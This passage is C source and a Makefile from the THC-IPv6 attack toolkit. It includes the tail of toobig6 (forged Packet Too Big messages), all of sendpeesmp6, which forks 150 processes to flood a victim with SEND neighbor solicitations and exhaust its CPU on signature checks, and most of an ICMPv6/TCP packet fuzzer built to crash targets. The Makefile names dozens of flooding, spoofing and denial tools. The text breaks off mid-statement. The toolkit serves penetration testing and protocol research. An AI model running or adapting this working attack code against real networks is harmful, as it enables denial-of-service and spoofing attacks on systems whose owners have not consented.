PREFER_GLOBAL, &pkt_len, src6, target6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, buf_len, 0) < 0) return -1; if (thc_generate_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } if (related) if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } usleep(50000); ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); ipv6->pkt[offset + 7] = (unsigned char) ttl; thc_toobig6(interface, src6, mac6, NULL, mtu, ipv6->pkt + offset, ipv6->pkt_len - offset); printf("toobig6 attack on %s for target %s and MTU %s sent.\n", argv[2], argv[3], argv[4]); return 0; } thc-ipv6-2.5/Makefile0000644000000000000000000000335012256337516013171 0ustar rootroot# Comment out if openssl-dev is not present HAVE_SSL=yes CC=gcc #CFLAGS=-g CFLAGS=-O2 CFLAGS+=$(if $(HAVE_SSL),-D_HAVE_SSL,) LDFLAGS+=-lpcap $(if $(HAVE_SSL),-lssl -lcrypto,) PROGRAMS=parasite6 dos-new-ip6 detect-new-ip6 fake_router6 fake_advertise6 fake_solicitate6 fake_mld6 fake_mld26 fake_mldrouter6 flood_mldrouter6 fake_mipv6 redir6 smurf6 alive6 toobig6 rsmurf6 implementation6 implementation6d sendpees6 sendpeesmp6 randicmp6 fuzz_ip6 flood_mld6 flood_mld26 flood_router6 flood_advertise6 flood_solicitate6 trace6 exploit6 denial6 fake_dhcps6 flood_dhcpc6 fake_dns6d fragmentation6 kill_router6 fake_dnsupdate6 ndpexhaust6 detect_sniffer6 dump_router6 fake_router26 flood_router26 passive_discovery6 dnsrevenum6 inverse_lookup6 node_query6 address6 covert_send6 covert_send6d inject_alive6 firewall6 ndpexhaust26 fake_pim6 thcsyn6 redirsniff6 flood_redir6 four2six dump_dhcp6 fuzz_dhcps6 flood_rs6 LIBS=thc-ipv6-lib.o STRIP=echo PREFIX=/usr/local MANPREFIX=${PREFIX}/share/man all: $(LIBS) $(PROGRAMS) dnssecwalk dnsdict6 thcping6 dnssecwalk: dnssecwalk.c $(CC) $(CFLAGS) -o $@ $^ dnsdict6: dnsdict6.c $(CC) $(CFLAGS) -o $@ $^ -lpthread -lresolv thcping6: thcping6.c $(LIBS) $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) -lrt %: %.c $(LIBS) $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) strip: all $(STRIP) $(PROGRAMS) dnssecwalk dnsdict6 thcping6 install: all strip install -m0755 -d ${DESTDIR}${PREFIX}/bin install -m0755 $(PROGRAMS) dnsdict6 thcping6 dnssecwalk *.sh ${DESTDIR}${PREFIX}/bin install -m0755 -d ${DESTDIR}${MANPREFIX}/man8 install -m0644 -D thc-ipv6.8 ${DESTDIR}${MANPREFIX}/man8 clean: rm -f $(PROGRAMS) dnsdict6 thcping6 dnssecwalk $(LIBS) core DEADJOE *~ backup: clean tar czvf ../thc-ipv6-bak.tar.gz * sync .PHONY: all install clean thc-ipv6-2.5/sendpeesmp6.c0000644000000000000000000001272412251022441014112 0ustar rootroot#include #include #include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, sendpeesmp6 disabled.\n"); return -1; } #else #include #include #include "thc-ipv6.h" #include #include #include #include #include #define HIGH 255 #define LOW 0 #define THREAD_NUM 150 /* data structure to hold data to pass to a thread (later converted to processes) */ struct thread_data { int thread_id; unsigned char *dev; unsigned char srchw[6]; unsigned char dsthw[6]; unsigned char *pkt; int pkt_len; }; /* array of these thread data structs */ struct thread_data thread_data_array[THREAD_NUM]; /* main function */ int main(int argc, char **argv) { thc_cga_hdr *cga_opt; /* CGA header */ thc_key_t *key; /* public key */ unsigned char *pkt = NULL; /* generic packet space */ unsigned char *dst6, *cga, *dev; /* IPv6 addrs */ /* various parts of packets, temporaries */ char advdummy[16], soldummy[24], prefix[8], *addr; /* MAC addresses for testing, attacking */ // unsigned char dsthw[] = "\xff\xff\xff\xff\xff\xff"; // unsigned char tgthw[] = "\x00\x1a\xa0\x41\xf0\x2d"; /*real attack mac */ unsigned char *tgthw; // unsigned char srchw[] = "\xdd\xde\xad\xbe\xef\xdd"; // unsigned char srchwreal[] = "\x00\x11\x11\x32\xb2\x84"; // unsigned char tag[] = "\xdd\xde\xad\xbe\xef\xdd\xdd\xde\xad\xbe\xef\xdd\xbe\xef\xaa\xaa"; int pkt_len = 0; /* packet length */ int flags = 0; /* ICMPv6 flags */ // thc_ipv6_rawmode(0); /* generate my own MAC addresses */ int debug = 0; /* debug switch */ FILE *fp; /* file pointer for reading from /dev/urandom */ unsigned char test[6]; /* randomized mac storage */ int result = 0, pid, status, i; /* exit codes */ int count = 1000000000; if (argc != 5) { printf("original sendpees by willdamn \n"); printf("modified sendpeesMP by Marcin Pohl \nCode based on thc-ipv6\n\n"); printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]); printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n"); printf("Example: %s eth0 2048 fe80:: fe80::1\n\n", argv[0]); exit(1); } memset(&test, 0, 6); /* set 6 bytes to zero */ fp = fopen("/dev/urandom", "r"); /* set FP to /dev/urandom */ dev = argv[1]; /* read interface from commandline */ if ((addr = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]); exit(-1); } if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", dev); exit(-1); } memcpy(prefix, addr, 8); /* first 8 bytes of sockaddr is prefix */ key = thc_generate_key(atoi(argv[2])); /* EXPENSIVE KEYGEN HERE! */ if (key == NULL) { printf("Couldn't generate key!"); exit(1); } /*makes options and the address*/ cga_opt = thc_generate_cga(prefix, key, &cga); /* cga = thc_resolve6("::"); */ if (cga_opt == NULL) { printf("Error during CGA generation"); exit(1); } /* ICMP6 TARGET, IPDST */ if (argv[4] == NULL) dst6 = thc_resolve6("ff02::1"); else dst6 = thc_resolve6(argv[4]); tgthw = thc_get_mac(dev, cga, dst6); test[0] = 0; /* set MAC to intel */ test[1] = 170; /* set MAC to intel */ test[2] = 0; /* set MAC to intel */ /* set ICMP OPTION SLLA HERE */ memset(advdummy, 'D', sizeof(advdummy)); memset(soldummy, 'D', sizeof(soldummy)); /* set destination IP here */ memcpy(advdummy, dst6, 16); /*dstIP */ memcpy(soldummy, dst6, 16); /*dstIP */ /* fixed values for NS */ soldummy[16] = 1; soldummy[17] = 1; memcpy(&soldummy[18], test, 6); /* SLLA OPTION */ /* ND flags */ flags = ICMP6_NEIGHBORADV_OVERRIDE; /* the forking starts here */ for (i = 0; i < THREAD_NUM; ++i) { pid = fork(); if (pid == 0) { printf("Creating thread %d\n", i); /*randomize MAC here*/ result = fread((char *) &test[3], 1, 3, fp); /* create IPv6 portion */ if ((pkt = thc_create_ipv6_extended(dev, PREFER_LINK, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) { printf("Cannot create IPv6 header\n"); exit(1); } /* create ICMPv6 with SeND options */ if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0x0, flags, soldummy, 24, cga_opt, key, NULL, 0) < 0) { printf("Cannot add SEND options\n"); exit(1); } free(cga_opt); if (debug) { printf("%02x:%02x:%02x:%02x:%02x:%02x\n", test[0], test[1], test[2], test[3], test[4], test[5]); // printf("%02x:%02x:%02x:%02x:%02x:%02x\n", dsthw[0], dsthw[1], dsthw[2], dsthw[3], dsthw[4], dsthw[5]); fflush(stdout); } /* attach the IPv6+ICMPv6+SeND to an Ethernet frame with random MAC */ if ((result = thc_generate_pkt(dev, test, tgthw, pkt, &pkt_len)) < 0) { fprintf(stderr, "Couldn't generate IPv6 packet, error num %d !\n", result); exit(1); } printf("Sending %d...", i); fflush(stdout); while (count) { /* send many packets */ thc_send_pkt(dev, pkt, &pkt_len); --count; } exit(1); } } wait(&status); return 0; } #endifthc-ipv6-2.5/fuzz_ip6.c0000644000000000000000000007551412251022437013450 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" /* * Fuzzing data types: * F = flags = 1 byte = 8 bits | flags | 8 ; 256 * B = byte = 1 byte | 0 1 254 255 xor XOR | 6 ; 256 * X = byte = 1 byte | all values from 0 to 255 * W = word = 2 bytes | 0,1,254,255^2 xor XOR | 18 ; 65536 * D = double word = 4 bytes | {0,1,254,255}^4 xor XOR | 258 ; 4294967295 * . = byte = ignore, jump over * */ char fuzztype_ether[] = ".............."; char fuzztype_ip6[] = "XF..WXBXX..............XX.............."; char fuzztype_ip6no[] = "........................................"; char fuzztype_icmp6[] = "XX.."; char fuzztype_icmp6no[] = "...."; char fuzztype_icmp6ping[] = ""; char fuzztype_icmp6ra[] = "........XXWWWXXXX........XX.............XXXX....XXXXXBB..XX.............XXXBB....XX.............XXXBB....X...X....XX.....X......XXXXXXXXX"; char fuzztype_icmp6ns[] = "XX..XX............XXXX"; char fuzztype_icmp6na[] = "FFFFXX............XXXX"; char fuzztype_icmp6nq[] = "FXFX........XX............XX"; char fuzztype_icmp6mld[] = "WWXXXX............XX"; char fuzztype_icmp6mld2rep[] = "WFFXFFF................................................XFFF................................................XFFF................................................"; char fuzztype_icmp6mld2que[] = "WWXXXX............XXFWFF"; char fuzztype_tcp[] = "WWWWWWXXWWWXXWXXXXXXWWWWXX"; unsigned char flags[] = { 0, 1, 2, 4, 8, 16, 32, 64, 128, 254, 255 }; // 11 unsigned char bytes[] = { 0, 1, 254, 255 }; // 4 unsigned short int words[] = { 0x0000, 0x0001, 0x00fe, 0x00ff, 0x0100, 0x0101, 0x01fe, 0x01ff, 0xfe00, 0xfe01, 0xfefe, 0xfeff, 0xff00, 0xff01, 0xfffe, 0xffff }; // 16 unsigned int xors[] = { 0, 0xffffffff }; // 2 unsigned char extends[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255 }; // 256 unsigned int dwords[] = { 0x00000000, 0x00000001, 0x000000fe, 0x000000ff, 0x00000100, 0x00000101, 0x000001fe, 0x000001ff, 0x0000fe00, 0x0000fe01, 0x0000fefe, 0x0000feff, 0x0000ff00, 0x0000ff01, 0x0000fffe, 0x0000ffff, 0x00010000, 0x00010001, 0x000100fe, 0x000100ff, 0x00010100, 0x00010101, 0x000101fe, 0x000101ff, 0x0001fe00, 0x0001fe01, 0x0001fefe, 0x0001feff, 0x0001ff00, 0x0001ff01, 0x0001fffe, 0x0001ffff, 0x00fe0000, 0x00fe0001, 0x00fe00fe, 0x00fe00ff, 0x00fe0100, 0x00fe0101, 0x00fe01fe, 0x00fe01ff, 0x00fefe00, 0x00fefe01, 0x00fefefe, 0x00fefeff, 0x00feff00, 0x00feff01, 0x00fefffe, 0x00feffff, 0x00ff0000, 0x00ff0001, 0x00ff00fe, 0x00ff00ff, 0x00ff0100, 0x00ff0101, 0x00ff01fe, 0x00ff01ff, 0x00fffe00, 0x00fffe01, 0x00fffefe, 0x00fffeff, 0x00ffff00, 0x00ffff01, 0x00fffffe, 0x00ffffff, 0x01000000, 0x01000001, 0x010000fe, 0x010000ff, 0x01000100, 0x01000101, 0x010001fe, 0x010001ff, 0x0100fe00, 0x0100fe01, 0x0100fefe, 0x0100feff, 0x0100ff00, 0x0100ff01, 0x0100fffe, 0x0100ffff, 0x01010000, 0x01010001, 0x010100fe, 0x010100ff, 0x01010100, 0x01010101, 0x010101fe, 0x010101ff, 0x0101fe00, 0x0101fe01, 0x0101fefe, 0x0101feff, 0x0101ff00, 0x0101ff01, 0x0101fffe, 0x0101ffff, 0x01fe0000, 0x01fe0001, 0x01fe00fe, 0x01fe00ff, 0x01fe0100, 0x01fe0101, 0x01fe01fe, 0x01fe01ff, 0x01fefe00, 0x01fefe01, 0x01fefefe, 0x01fefeff, 0x01feff00, 0x01feff01, 0x01fefffe, 0x01feffff, 0x01ff0000, 0x01ff0001, 0x01ff00fe, 0x01ff00ff, 0x01ff0100, 0x01ff0101, 0x01ff01fe, 0x01ff01ff, 0x01fffe00, 0x01fffe01, 0x01fffefe, 0x01fffeff, 0x01ffff00, 0x01ffff01, 0x01fffffe, 0x01ffffff, 0xfe000000, 0xfe000001, 0xfe0000fe, 0xfe0000ff, 0xfe000100, 0xfe000101, 0xfe0001fe, 0xfe0001ff, 0xfe00fe00, 0xfe00fe01, 0xfe00fefe, 0xfe00feff, 0xfe00ff00, 0xfe00ff01, 0xfe00fffe, 0xfe00ffff, 0xfe010000, 0xfe010001, 0xfe0100fe, 0xfe0100ff, 0xfe010100, 0xfe010101, 0xfe0101fe, 0xfe0101ff, 0xfe01fe00, 0xfe01fe01, 0xfe01fefe, 0xfe01feff, 0xfe01ff00, 0xfe01ff01, 0xfe01fffe, 0xfe01ffff, 0xfefe0000, 0xfefe0001, 0xfefe00fe, 0xfefe00ff, 0xfefe0100, 0xfefe0101, 0xfefe01fe, 0xfefe01ff, 0xfefefe00, 0xfefefe01, 0xfefefefe, 0xfefefeff, 0xfefeff00, 0xfefeff01, 0xfefefffe, 0xfefeffff, 0xfeff0000, 0xfeff0001, 0xfeff00fe, 0xfeff00ff, 0xfeff0100, 0xfeff0101, 0xfeff01fe, 0xfeff01ff, 0xfefffe00, 0xfefffe01, 0xfefffefe, 0xfefffeff, 0xfeffff00, 0xfeffff01, 0xfefffffe, 0xfeffffff, 0xff000000, 0xff000001, 0xff0000fe, 0xff0000ff, 0xff000100, 0xff000101, 0xff0001fe, 0xff0001ff, 0xff00fe00, 0xff00fe01, 0xff00fefe, 0xff00feff, 0xff00ff00, 0xff00ff01, 0xff00fffe, 0xff00ffff, 0xff010000, 0xff010001, 0xff0100fe, 0xff0100ff, 0xff010100, 0xff010101, 0xff0101fe, 0xff0101ff, 0xff01fe00, 0xff01fe01, 0xff01fefe, 0xff01feff, 0xff01ff00, 0xff01ff01, 0xff01fffe, 0xff01ffff, 0xfffe0000, 0xfffe0001, 0xfffe00fe, 0xfffe00ff, 0xfffe0100, 0xfffe0101, 0xfffe01fe, 0xfffe01ff, 0xfffefe00, 0xfffefe01, 0xfffefefe, 0xfffefeff, 0xfffeff00, 0xfffeff01, 0xfffefffe, 0xfffeffff, 0xffff0000, 0xffff0001, 0xffff00fe, 0xffff00ff, 0xffff0100, 0xffff0101, 0xffff01fe, 0xffff01ff, 0xfffffe00, 0xfffffe01, 0xfffffefe, 0xfffffeff, 0xffffff00, 0xffffff01, 0xfffffffe, 0xffffffff }; // 256 #define COUNT_FLAG 11 #define COUNT_BYTE 4 #define COUNT_WORD 16 #define COUNT_XOR 2 #define COUNT_EXTEND 256 #define NEVER 2000000000 #define TEST_MAX (NEVER - 1) #define DO_NONE 0 #define DO_PING 1 #define DO_NEIGHSOL 2 #define DO_NEIGHADV 3 #define DO_RA 4 #define DO_NODEQUERY 5 #define DO_TCP 6 #define DO_MLD_REP 131 #define DO_MLD_DONE 132 #define DO_MLD_QUERY 130 #define DO_MLD2_QUERY 256 #define DO_MLD2_REPORT 143 int port = -1; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-X|-1|-2|-3|-4|-5|-6|-7|-8|-9|-0 port] interface unicast-or-multicast-address [address-in-data-pkt]\n\n", prg); printf("Fuzzes an icmp6 packet\n"); printf("Options:\n"); printf(" -X do not add any ICMP/TCP header (transport layer)\n"); printf(" -1 fuzz ICMP6 echo request (default)\n"); printf(" -2 fuzz ICMP6 neighbor solicitation\n"); printf(" -3 fuzz ICMP6 neighbor advertisement\n"); printf(" -4 fuzz ICMP6 router advertisement\n"); printf(" -5 fuzz multicast listener report packet\n"); printf(" -6 fuzz multicast listener done packet\n"); printf(" -7 fuzz multicast listener query packet\n"); printf(" -8 fuzz multicast listener v2 report packet\n"); printf(" -9 fuzz multicast listener v2 query packet\n"); printf(" -0 fuzz node query packet\n"); printf(" -s port fuzz TCP-SYN packet against port\n"); printf(" -x tries all 256 values for flag and byte types\n"); printf(" -t number continue from test no. number\n"); printf(" -T number only performs test no. number\n"); printf(" -p number perform an alive check every number of tests (default: none)\n"); printf(" -a do not perform initial and final alive test\n"); printf(" -n number how many times to send each packet (default: 1)\n"); printf(" -I fuzz the IP header too\n"); printf(" -F add one-shot fragmentation, and fuzz it too (for 1)\n"); printf(" -S add source-routing, and fuzz it too (for 1)\n"); printf(" -D add destination header, and fuzz it too (for 1)\n"); printf(" -H add hop-by-hop header, and fuzz it too (for 1 and 5-9)\n"); printf(" -R add router alert header, and fuzz it too (for 5-9 and all)\n"); printf(" -J add jumbo packet header, and fuzz it too (for 1)\n"); // printf("Use -r to use raw mode.\n"); printf("You can only define one of -0 ... -9 and -s, defaults to -1.\n"); printf("Returns -1 on error, 0 on tests done and targt alive or 1 on target crash.\n"); exit(-1); } void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { return; } int check_alive(pcap_t * p, char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst) { int ret = -2; time_t t; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_ping26(interface, srcmac, dstmac, src, dst, 16, 1); t = time(NULL); while (ret < 0) { if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; if (time(NULL) > t + 1 && ret == -2) { thc_ping26(interface, srcmac, dstmac, src, dst, 16, 1); ret = -1; } if (time(NULL) > t + 4 && ret < 0) ret = 0; } return ret > 0 ? 1 : 0; } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, *pkt_bak, *mcast6, *someaddr6 = NULL; unsigned char *dst6, *src6 = NULL, *mac = NULL, *routers[2], string[64] = "ip6 and dst "; int test_start = 0, fragment = 0, alert = 0, sroute = 0; int do_type = DO_PING, do_alive = 1, hopbyhop = 0, destination = 0, jumbo = 0; int pkt_len = 0, offset = 0, test_current = 0, i, j, k, do_fuzz = 1, test_ptr = 0; int test_end = TEST_MAX, ping = NEVER, frag_offset = 0, header = 0, no_send = 1; int test_pos = 0, test_cnt = 0, do_it, extend = 0, mtu = 1500, size = 64, wait = 0, off2 = 14; char *interface, fuzzbuf[256], *srcmac, *dns, *route6, *real_dst6 = NULL; unsigned char buf[256], buf2[100], buf3[16]; unsigned short int *sip; pcap_t *p; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "s:0123456789Xxt:T:p:FSDHRIJan:")) >= 0) { switch (i) { case 's': do_type = DO_TCP; port = atoi(optarg); break; case '0': do_type = DO_NODEQUERY; break; case '1': do_type = DO_PING; break; case '2': do_type = DO_NEIGHSOL; break; case '3': do_type = DO_NEIGHADV; break; case '4': do_type = DO_RA; break; case '5': do_type = DO_MLD_REP; break; case '6': do_type = DO_MLD_DONE; break; case '7': do_type = DO_MLD_QUERY; wait = 0xff0000; break; case '8': do_type = DO_MLD2_REPORT; break; case '9': do_type = DO_MLD2_QUERY; wait = 0xff0000; break; case 'X': do_type = DO_NONE; break; case 't': test_start = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'p': ping = atoi(optarg); break; case 'a': do_alive = 0; break; case 'S': sroute = 1; break; case 'n': no_send = atoi(optarg); break; case 'F': fragment = 1; break; case 'R': alert = 1; break; case 'D': destination = 1; break; case 'H': hopbyhop = 1; break; case 'J': jumbo = 1; break; case 'I': header = 1; break; case 'x': extend = 1; break; } } if (argc - optind < 2) { fprintf(stderr, "ERROR: not enough options, interface and target address are required!\n"); exit(-1); } interface = argv[optind]; if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "ERROR: %s is not a valid interface which has a MAC, use raw mode?\n", interface); exit(-1); } if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (do_hdr_size) { test_pos -= do_hdr_size; offset -= do_hdr_size; off2 = do_hdr_size; } if (do_type != DO_PING && do_type != DO_TCP && do_type != DO_NONE) { if ((mcast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (do_type == DO_NEIGHSOL) { dst6 = thc_resolve6("ff02::0001:ff00:0000"); memcpy(dst6 + 13, mcast6 + 13, 3); } else dst6 = thc_resolve6("ff02::1"); } else { dst6 = thc_resolve6(argv[optind + 1]); } if (argv[optind + 1] != NULL) if ((real_dst6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (interface == NULL || argv[optind + 1] == NULL) { printf("Error: interface and target-ipv6-address are mandatory command line options\n"); exit(-1); } if (ping < 1 || test_end < test_start) { printf("don't fuck up the command line options!\n"); exit(-1); } if (argv[optind + 2] != NULL) someaddr6 = thc_resolve6(argv[optind + 2]); if (argc - optind > 3) { printf("Error: too many command line options\n"); exit(-1); } if ((mac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if (do_type == DO_PING || do_type == DO_TCP || do_type == DO_NONE) src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); if (src6 == NULL) { fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); if (sroute) { if (someaddr6 != NULL) routers[0] = someaddr6; else routers[0] = dst6; routers[1] = NULL; } setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); dns = thc_resolve6("ff02::fb"); route6 = thc_resolve6("2a01::"); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (real_dst6 != NULL && real_dst6[0] == 0xff) do_alive = 0; // ping before to check if it works if (do_alive) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]); exit(-1); } // generate basic packet strcpy(fuzzbuf, fuzztype_ether); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (header) strcat(fuzzbuf, fuzztype_ip6); else strcat(fuzzbuf, fuzztype_ip6no); if (alert || hopbyhop || jumbo) { memset(buf2, 0, sizeof(buf2)); i = 0; if (alert) { buf2[i++] = 5; buf2[i++] = 2; i += 2; strcat(fuzzbuf, ".F.F"); } if (jumbo) { buf2[i++] = 0xc2; buf2[i++] = 4; buf2[i++] = 'J'; // lookup code buf2[i++] = 'J'; buf2[i++] = 'J'; buf2[i++] = 'J'; strcat(fuzzbuf, ".FBBBB"); } if (hopbyhop) { memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... for every new option } } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } if (sroute) { if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; else { strcat(fuzzbuf, "FFFFBBBB................"); offset += 24; } } if (fragment) { frag_offset = offset; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, 0) < 0) return -1; else { strcat(fuzzbuf, "FFWW.."); offset += 8; } } if (destination) { memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; i = 0; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... for every new option } if (thc_add_hdr_dst(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } memset(buf, 0, sizeof(buf)); // if (header) strcat(fuzzbuf, fuzztype_icmp6); // else // strcat(fuzzbuf, fuzztype_icmp6no); switch (do_type) { case DO_TCP: // tcp options buf[0] = 2; // max segment size buf[1] = 4; buf[2] = 255; buf[3] = 255; buf[4] = 3; // windows size buf[5] = 3; buf[6] = 62; buf[7] = 1; // padding buf[8] = 8; // timestamp buf[9] = 10; buf[10] = time(NULL) / 16777216; buf[11] = ((time(NULL) / 65536) % 256); buf[12] = ((time(NULL) / 256) % 256); buf[13] = time(NULL) % 256; // 4 bytes ack tstamp 00000000 // rest is padding (2 bytes) if (thc_add_tcp(pkt, &pkt_len, 65532, port, test_current, 0, TCP_SYN, 5760, 0, (unsigned char *) buf, 20, (unsigned char *) buf, 20) < 0) return -1; strcat(fuzzbuf, fuzztype_tcp); break; case DO_PING: if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, test_current, (unsigned char *) &buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ping); break; case DO_NONE: // empty break; case DO_NEIGHSOL: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, mcast6, 16); buf[16] = 1; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ns); break; case DO_NEIGHADV: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, src6, 16); buf[16] = 2; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, 0xe0000000, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6na); break; case DO_NODEQUERY: memcpy(buf + 8, real_dst6, 16); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NODEQUERY, 0, 0x0003003e, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6nq); break; case DO_RA: // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); if (someaddr6 != NULL) memcpy(&buf[32], someaddr6, 16); else memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // = 8 == 56 // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 64; // prefix length /64 buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; buf[i++] = 4; // 56-71 address, 2004:: for default i += 14; // = 24 == 70 // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; if (someaddr6 != NULL) memcpy(buf + i, someaddr6, 16); // dns server else memcpy(buf + i, dns, 16); // dns server i += 16; // = 24 == 94 // seachlist option buf[i++] = 31; buf[i++] = 4; i += 2; memset(buf + i, 1, 4); // validity time i += 4; buf[i++] = 3; memcpy(buf + i, "foo", 3); i += 3; buf[i++] = 4; memcpy(buf + i, "corp", 4); i += 5; // + null byte buf[i++] = 5; memcpy(buf + i, "local", 5); i += 5; buf[i++] = 6; memcpy(buf + i, "domain", 6); i += 7; // + null byte // = 32 == 126 // flag extension option buf[i++] 